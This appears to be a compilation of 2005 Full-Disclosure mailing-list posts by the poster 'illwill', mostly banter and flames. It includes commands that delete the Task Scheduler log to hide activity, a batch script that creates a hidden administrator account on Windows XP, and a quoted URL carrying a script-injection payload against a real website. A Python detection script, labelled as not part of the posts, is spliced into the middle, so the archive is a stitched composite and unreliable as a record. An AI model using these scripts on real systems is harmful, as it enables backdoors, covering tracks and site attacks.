Re: Re[2]: [Full-disclosure] elevating privileges from Admin to SYSTEM
make sure ya clean up :)

C:\>net stop "Task Scheduler"
C:\>del %SystemRoot%\SchedLgU.Txt
C:\>net start "Task Scheduler"

- illwill

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Odd My_Photo.zip in email
receiving an odd email with an attached zip file called "My_Photo.zip" containing a .jpg and a .bat that only has execution code of "My Photo.jpg" in it. the .jpg itself looks to be an encrypted vb dll with just the .jpg extension changed .. but I'm just curious as to how this virus planned on executing itself, I've seen the mydoom virus spreading this way but it included something like a .cpl file or a file with a bunch of spaces to hide the extension of .pif etc .. not at home right now to analyze but wondering if anyone came across this

--
- illwill
Re: [Full-disclosure] Google Secure Access or "How to have people download a trojan."
On 9/21/05, Paul Nickerson <[EMAIL PROTECTED]> wrote:
> "What's the last security advisory that YOU have come out with?"

yea Paul, we all don't know how to take 2 pre-existing flaws and mash them together with the help of others to make our so-called 'security advisories' and credit ourselves. Need help patting yourself on the back?

--
- illwill
Re: [Full-disclosure] Google Secure Access or "How to have people download a trojan."
"Not to mention as Microsoft becomes better at everything it does and becomes righteous" - Paul, Greyhats Security

You have a skewed vision of reality, little guy. They must have been stroking you the whole time they invited you to their 'bluehat conference'.

--
- illwill
[Full-disclosure] killbits? should have named them kibbles and bits
Background: Killbits are used to block certain ActiveX controls from running within Windows. It is possible using certain methods to bypass this remotely.

This goes out to my favorite company in the whole world, Microsoft. Thanks for the upcoming vacation. :)

MS security department head (Hi Terry) will stop at nothing to cover that killbit can be bypassed remotely and to keep it a secret from vendors.

Here's a hint evil browser hax0rs: play around with every different way to instantiate ActiveX objects.

More to come?

hack the planet
illwill
all your exploits are back to belonging to us
Re: [Full-disclosure] Mozilla Firefox "Host:" Buffer Overflow Exploit
> (the most common examples of MS who^H^H^H zealots are: 1. "MS is giving me money, so billg is good")

must be Paul's grey hat continues to get whiter by the day, i thought it was just because his mom never taught him not to bleach dark clothes.

-illwill
Re: [Full-disclosure] talk.google.com
google just released the newest version with downloadable tinfoil hat
Re: [Full-disclosure] FrSIRT False Alarm
On 8/20/05, Paul <[EMAIL PROTECTED]> wrote:
> Not to mention this is hardly even assembly. This is like really ghetto
> assembly. In REAL assembly, there would be no ".if" statements. It's all cmp
> blah blah, jz, jnz, etc. Lots more work. Also, there is no such thing as
> .invoke MessageBox. Give me a break. In real assembly, that code would be
> about 5 times longer.
>
> Regards,
> Paul
> Greyhats Security
> http://greyhatsecurity.org

Paul is just in a pissing contest because i let the cat out of the bag with his firefox sploit a few months back.. also is now mad because microsoft is closely watching this list and i know about his remote activeX killbit bypass that he has 'under his belt' as he claims (yes i know how to start an object other than in http://greyhatsecurity.org , claims "Paul from Greyhats has become a whitehat. I will still refer to myself as "Paul from Greyhats"; however, I will abide to the ethics of a whitehat. Vendors are our friends, and we need to work with them to protect the customers"

it must be nice when people hand u known vulns in the past and now im sure from working with microsoft they had known about this killbit already and you're a test monkey now. tell bill gates illwill sends his love.

http://illmob.org/paul.html

--
- illwill
http://illmob.org
Re: [Full-disclosure] Re: FrSIRT False Alarm
i made a killbit in 'assembly' too using all types of invokes and .if statements too. why would i spend more than the 20 minutes i did on it using jmps jz mov etc .. i'd rather spend my friday night partying.. here's my binary and source http://illmob.org/0day/msdds.dll_deactivator.rar

btw there are still ways around this killbit registry mod :D

On 8/22/05, Dave Korn <[EMAIL PROTECTED]> wrote:
> Original Message
> >From: Paul
> >Message-Id: [EMAIL PROTECTED]
>
> > Not to mention this is hardly even assembly. This is like really ghetto
> > assembly. In REAL assembly, there would be no ".if" statements. It's all
> > cmp blah blah, jz, jnz, etc. Lots more work. Also, there is no such
> > thing as .invoke MessageBox. Give me a break. In real assembly, that code
> > would be about 5 times longer.
>
> Umm, this really just suggests that you aren't aware of the past thirty
> years worth of advances in assembler technology. Assemblers have had macro
> functionality since as far back as anyone can remember, your claim that a
> programmer should write everything out longhand is just ridiculous. It's
> like suggesting that nobody should use "#define" in C because it's cheating.
> And hey, don't use loops, write the instruction sequence over and over again
> by hand. Don't use subroutines either, that's cheating too! Of course, in
> my day, we had nothing but front panel switches, and we had to toggle them
> with our bare teeth, and father would make us get oop at six o'clock in 't
> morning and conduct electricity to computer using our own arms and legs for
> power cables
>
> cheers,
> DaveK
> --
> Can't think of a witty .sigline today

--
- illwill
http://illmob.org
Re: [Full-disclosure] An old/new security list
thinking security-minded people always backed up their hdds daily :D

On 8/22/05, TheGesus <[EMAIL PROTECTED]> wrote:
> Gee, Dave, isn't "availability" part of your security program?
>
> 2nd time this year, dude.
>
> On 8/22/05, Dave Aitel <[EMAIL PROTECTED]> wrote:
> > Immunity suffered a hard drive problem, so if you were on this list:
> > http://www.immunitysec.com/mailman/listinfo/dailydave , we invite you to
> > resubscribe. We'll be announcing new versions of MOSDEF, SPIKE, SPIKE
> > Proxy, and an all new unmidl.py as soon as we get our infrastructure
> > ready. (It's easier to make new tarballs than to recover the old ones).
> > There will probably also be discussions of Buffy the Vampire slayer,
> > hand crafted IDL files for random MS services, lobster farms, flames,
> > and the usual lot.
> >
> > Thanks,
> > Dave Aitel
> > Immunity, Inc.

--
- illwill
http://illmob.org
Re: [Full-disclosure] Zotob Worm Remover
problem was most of the laptop users are normally behind a firewall during the work week, then go home on dial-up unprotected, then come back to work on monday :)

btw vers. 1.1 is done that kills variants H and I .. http://illmob.org/0day/Zotob_Killer1.1.rar

--
- illwill
http://illmob.org
Re: [Full-disclosure] Zotob Worm Remover
Made a Zotob Worm Remover that removes the processes/files/registry entries from variants A through G. Includes MASM source code.

http://illmob.org/0day/Zotob_Killer.rar

- illwill
http://illmob.org
Re: [Full-disclosure] hidden users on windows?
old news for XP

@echo off
@echo HideUserXP.bat
@echo by illwill http://illmob.org
@echo This will create a hidden user with admin rights in XP
@echo ( hidden meaning that the username wont appear in the logon screen)
@echo To log on to your hidden account, you need to use the Log On To Windows dialog box by pressing Ctrl + Alt + Delete twice.
@echo Make sure you're logged off all accounts. You can't just switch users.
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
attrib +r +a +s +h %SystemDrive%\docume~1\illwill
Exit

On 8/3/05, nabiy <[EMAIL PROTECTED]> wrote:
> Hello,
>
> A security issue has been identified in current versions of windows that allows 'hidden' user accounts. The User Account Manager in the Windows Control Panel and the 'Welcome Screen' both fail to report interactive logons made with the netapi. This security issue has been verified on Windows 2000 Professional, Windows XP Home Edition and Windows XP Professional. Microsoft was notified of this issue on July 28, 2005.
>
> The problem is not with the netapi or the ability to create users but with the User Account Manager in Windows. It simply fails to list all of the users that are on the system. This issue was noticed while exploring the netapi on windows – users created with the netuseradd function failed to show up in both the User Account Manager and on the Welcome Screen. The failure to list users made with the netapi presents a problem for obvious reasons; home users and even administrators expect to see all of the users on their system when using these facilities.
>
> The solution in all versions of windows is simple. Do not depend on the User Account Manager when managing user accounts on your system. Instead, users should use the Local Users and Groups management snapin or the net command from the cli.
>
> More information has been documented at http://neworder.box.sk
>
> nathan aguirre
> --
> http://nabiy.sdf1.org . gopher://sdf.lonestar.org/11/users/nabiy
> The Super Dimension Fortress Public Access Unix System

--
- illwill
http://illmob.org
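As an added defender-side check (not part of illwill's or nabiy's posts), the following Python parses a regedit export of the SpecialAccounts\UserList key and reports accounts that the Welcome screen and the User Accounts applet would hide, flagging any outside an assumed XP baseline or sitting in the local Administrators group. The sample export, the baseline set and the Administrators list are constructed for the example.

```python
import re

# Constructed sample in the "Windows Registry Editor Version 5.00" format that
# regedit exports (and that the batch file above writes); not from a real host.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"HelpAssistant"=dword:00000000
"illwill"=dword:00000000
"Guest"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DefaultUserName"="Owner"
"""

USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")
# Assumed baseline of accounts XP itself hides through this key; adjust per build.
BASELINE_HIDDEN = {"helpassistant", "support_388945a0"}
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(?:dword:([0-9A-Fa-f]{8})|"(.*)")$')

def parse_reg(text):
    """Map each [key] to {value name: value}. Only dword and string values are
    decoded; hex: blobs are skipped. Expects decoded text: a real export is
    UTF-16LE, so open it with encoding='utf-16'."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line) if current else None
        if m:
            name, dword, string = m.groups()
            keys[current][name] = int(dword, 16) if dword is not None else string
    return keys

def hidden_accounts(text):
    """Accounts whose UserList entry is dword 0: dropped from the Welcome screen
    and the User Accounts applet, but still able to log on."""
    values = parse_reg(text).get(USERLIST_KEY, {})
    return sorted(n for n, v in values.items() if v == 0)

def suspicious_hidden_accounts(text):
    """Hidden accounts outside the assumed XP baseline."""
    return [n for n in hidden_accounts(text) if n.lower() not in BASELINE_HIDDEN]

def hidden_admins(text, admins):
    """Hidden accounts that are also local Administrators; `admins` is the member
    list, e.g. taken from `net localgroup administrators` output."""
    lowered = {a.lower() for a in admins}
    return [n for n in hidden_accounts(text) if n.lower() in lowered]
```

Run `hidden_admins(SAMPLE_REG, ["Administrator", "illwill"])` to see the hidden administrator the sample contains; on a live host, feed it the output of `regedit /e` for the UserList key together with the real Administrators membership.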
Re: [Full-disclosure] Some VNC doubts : access server behind TCP/IP proxy or gateways
tcpredir, fpipe, bouncer

On 7/5/05, Aditya Deshmukh <[EMAIL PROTECTED]> wrote:
> Hi List,
>
> I have a very peculiar problem about accessing VNC server behind gateways and proxy server... Here is the background info...
>
> I have a client who has pretty big vnc installation base mostly windows but Linux and Solaris also included. Most of the Road Warriors have windows with vnc and ssh installed on them ( mostly winxp sp2 )
>
> VNC is used to remote admin or support for some of the road warriors. But most of the times when the VNC server is behind a gateway like this it wont connect.
>
> [ Internet ] -- [ Gateway ] --- [ Lan ]
>
> The workaround is to use the UltraVNC relay service, but if you don't have any control over the gateway this becomes impossible to operate. And I hate to open ports in the firewalls of the road warriors' computers.
>
> Is there a way something like reverse shell that allows someone to connect to a VNC server, behind gateway and through firewalls without opening any holes in it or a tcp/ip proxy that is proxy that does not allow connections from the internet ?
>
> Basically, the user initiates the connection and the helpdesk can use the same socket to the laptop for connection over VNC ( vnc encryption and compression have already been taken care of, and only one socket is needed for all this - for a firewall I would require only one hole )
>
> Any help would be appreciated
>
> - aditya
>
> Delivered using the Free Personal Edition of Mailtraq ( www.mailtraq.com)

--
- illwill
http://illmob.org
Re: [Full-disclosure] Publishing exploit code - what is it good for
I think Edwin Starr said it best: "Code – Good God Y'all, What is it good for? Absolutely nothing" .. or was it war?

--
- illwill
http://illmob.org
Re: [Full-disclosure] COX Internet Outage
i was down pretty much all day
Re: [Full-disclosure] Micky-dee's anyone?
any way of scripting a free happy meal or somethin?

On 5/1/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> To all you people that like McDonalds, here is a quick link that may show you the light:
>
> http://www.mcdonalds.com/app_controller.bumper.bumper.html?_continue=%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63%65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E%74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%79%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29%3B%3C%2 F%73%63%72%69%70%74%3E
>
> Interesting, huh?
>
> Regards,
> Pauil

--
- illwill
http://illmob.org
Re: [Full-disclosure] Hacked: Who Else Is Using Your Computer?
I think this article should have been posted on some aol mailing list. I'm sorry but it looks like it was written for someone who's never used a computer, or it looks like an ad for av companies. I hope to think half the users on this list didn't find any part of the article informative.

--
- illwill
http://illmob.org
Re: [Full-disclosure] phrack.org - path disclosure
don't you think it would have been better if you just emailed the webmaster instead of cluttering the list with something so fucking stupid

On Tue, 8 Mar 2005 22:04:22 +0100, Crg <[EMAIL PROTECTED]> wrote:
> http://www.phrack.org/
>
> Warning: mysql_connect(): Can't connect to local MySQL server through socket
> '/var/run/mysqld/mysqld.sock' (11) in
> /var/www/phrack.org/htdocs/.config/phracksql_inc.php on line 106
>
> error: mysql_connect() failed
> agent:
> via:
> remote:
> forwarded:
> url:
> Please contact [EMAIL PROTECTED]
>
> Hey guys! who forgot to add safe_mysqld to init scripts ?
>
> Also could be nice to disable display_errors :P
>
> Regards
>
> /Crg
>
> "What's stopping you?"

--
- illwill
http://illmob.org